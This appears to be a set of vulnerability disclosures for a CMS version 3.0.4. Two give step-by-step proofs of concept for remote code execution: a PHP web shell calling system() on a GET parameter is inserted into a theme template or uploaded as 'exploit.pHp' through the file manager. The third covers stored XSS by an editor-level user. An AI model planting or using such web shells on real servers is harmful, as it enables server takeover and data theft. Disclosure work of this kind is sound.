Version: 3.0.4

Description

An attacker could insert any executable code through php via Theme module in Templates function edit to execution command in the server.

Proof of Concept

Step 1: Go to "/admin/index.php?id=themes&action=edit_template&filename=blog", click "Edit" and insert payload:

<?php
if($_GET['cmd']) {
  system($_GET['cmd']);
  }
?>

Step 2: Click "Save and Exit", then go to "/blog"

command: whoami

command: dir /b

Version: 3.0.4

Description

It is possible to insert javascript in page content created by a user with editor permission.

Proof of Concept

Step 1: Go to "/admin/index.php?id=pages&action=add_page", create new blog with content include javascript code by user editor

Result: Any user accessing the blog page will execute the added javascript code, example I login with user admin

Blog Page:

Impact

Can steal or manipulate client sessions and cookies, can be used to impersonate legitimate users, allow hackers to view or change user profiles, and perform transactions as users there, including administrator

Version: 3.0.4

Description

An attacker could insert any executable code through php via Files Module to execution command in the server.

Proof of Concept

Step 1: Go to "/admin/index.php?id=filesmanager", click "Select File" and upload "exploit.pHp" then click "Upload".

exploit.pHp content:

<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?php
if($_GET['cmd']) {
  system($_GET['cmd']);
  }
?>
</pre>
</BODY></HTML>

Upload success

Step 2: Access the file uploaded and RCE

command: whoami

command: dir